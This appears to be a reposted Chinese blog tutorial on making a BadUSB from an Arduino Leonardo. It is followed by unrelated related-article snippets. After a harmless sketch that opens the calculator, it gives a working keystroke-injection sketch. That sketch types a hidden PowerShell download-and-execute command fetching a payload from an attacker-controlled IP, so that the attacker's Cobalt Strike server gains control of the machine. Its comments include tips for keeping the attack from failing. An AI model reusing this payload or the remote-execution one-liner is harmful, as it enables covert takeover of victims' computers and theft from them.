BadUsb使用

news/2024/12/29 1:59:53/

1 IDE下载

地址:Software | Arduino

2 开发版驱动安装

linux和mac版本会自动识别提示你安装开发板,驱动貌似不需要额外安装

win需要根据板子型号去下载安装驱动  如

Arduino驱动的安装教程-DFRobot产品资料库

默认会提示你根据你插入的设备进行提示下载,以下为手工操作

开发板选择

串口识别选择

3 编写代码-编译上传

点击红色箭头,先编译后上传到BadUsb

主要实现模拟硬件按键弹出计算器

#include <Keyboard.h>
void setup() {
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CALC");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}void loop()//循环
{
}

上线CS代码参考:

badusb详细制作教程(两种方式实现远控)_ESQ404的博客-CSDN博客

#include <Keyboard.h>
void setup() {Keyboard.begin();//向被攻击主机发送信息,伪装成一个USB键盘并准备通讯delay(1542);//等待1.542秒,因为电脑在把Leonardo识别成键盘并接受输入时会有1~2秒的延迟,也可以看情况修改,防止输入遗漏Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);//按下大写键,防止一些中文输入法的干扰Keyboard.press(KEY_LEFT_GUI);Keyboard.press('r');POWERSHELL.EXE -NOP -W HIDDEN -C "iex ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://xx.xx.xx.xx:80/A'))"Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');//输入windows+r让电脑弹出“运行”输入框delay(736);//等待0.736秒//这里等待的原因是有些速度较慢的电脑在弹出输入框是有延迟,如果不等待直接执行后续代码输入字符的话会出现输入代码不完全的情况,导致攻击失败Keyboard.println("POWERSHELL.EXE -NOP -W HIDDEN -C \"iex ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING(\'HTTP://xx.xx.xx.xx:80/A\'))\"");//上一行中println里的大写字母在badusb模拟键盘输入电脑时会转为小写,小写字母则会转为大写//所以在修改地址时注意要把大写字母和小写字母转换一下,否则输入代码时会因字母大小写相反导致攻击失败//192.168.1.2:80/a换成你自己的地址Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();
}
void loop() {
}

4 测试

插入win机器即可弹计算器或者上线CS

参考:

BadUSB制作-详细指南 - JE2Se ' Blog

插一个U盘黑一台电脑-Badusb详细教程 - 简书

由Arduino Leonardo初识BadUsb - FreeBuf网络安全行业门户


http://www.ppmy.cn/news/61902.html

相关文章

端口聚合与Hash算法

目录 前言 一、Hash算法简介 二、负载分担 1.逐流负载分担 2.逐包负载分担 三、Hash算法与负载分担 1.转发原理 四、堆叠情况下的负载分担 五、配置流程 前言 提示&#xff1a;关于Hash与负载分担方式 提示&#xff1a;以下是本篇文章正文内容&#xff0c;下面案例可供…

【工具使用】- git实现gitee托管代码以及检出代码

1. 下载Git工具 git下载地址1&#xff1a;https://git-scm.com/download/win git下载2&#xff1a;https://mirrors.tuna.tsinghua.edu.cn/github-release/git-for-windows/git/Git%20for%20Windows%202.40.1/ 下载完成后安装 安装直接执行exe可执行程序&#xff0c;下一步…

学习系统编程No.23【信号实战】

引言&#xff1a; 北京时间&#xff1a;2023/4/23&#xff0c;最近学习状态不怎么好&#xff0c;总是犯困&#xff0c;没精力的感觉&#xff0c;可能是病没有好彻底的原因&#xff0c;也可能是我内心因为生病而认为摆烂理所应当&#xff0c;反正最后导致摆烂&#xff0c;课现在…

windows安装node.js和vue3.x

目录 下载并安装node配置环境变量配置淘宝镜像源安装webpack全局打包工具安装cnpm安装vue-cli 3.xcnpm问题警告的解决办法 下载并安装node 1&#xff0c;下载nodejs 直接从node.js官网下载&#xff1a;https://nodejs.org/en/download 根据自己电脑的版本选择32位或者64位&…

DMU 以及后期flashback 回退

DMU作为数据库字符集的转换工具&#xff0c;在转换后可能需要回退。这时可以结合oralce的flash back database Step 1: Enable Archiving( Ignore this if your database is already in archive log mode and archive log is enabled): CONN / AS SYSDBA ALTER SYSTEM SET log…

Java设计模式-代理模式

简介 代理模式是一种结构型设计模式&#xff0c;它可以让我们通过一个代理对象来访问一个真实的目标对象&#xff0c;从而实现对目标对象的功能扩展或保护。代理模式的主要角色有三个&#xff1a; 抽象主题&#xff08;Subject&#xff09;&#xff1a;定义了真实主题和代理主…

工地烟火AI监控识别分析系统 yolov7

工地烟火AI监控识别分析系统通过yolov7网络模型技术&#xff0c;工地烟火AI监控识别分析系统对工地或者厂区现场监控区域内的烟火进行实时分析报警。YOLOv7 的发展方向与当前主流的实时目标检测器不同&#xff0c;研究团队希望它能够同时支持移动 GPU 和从边缘到云端的 GPU 设备…

惩治标题党,vue2监听父组件传过来的值,el-tree一键全选多个树形

vue2监听父组件传过来的值 父组件使用的动态组件&#xff0c;然后父传子 <component :is"checkedIt" :riskQuarterriskQuarter :riskYearriskYear></component> 子组件打印 console.log(riskQuarter :>> , this.$props.riskQuarter); 监听 pr…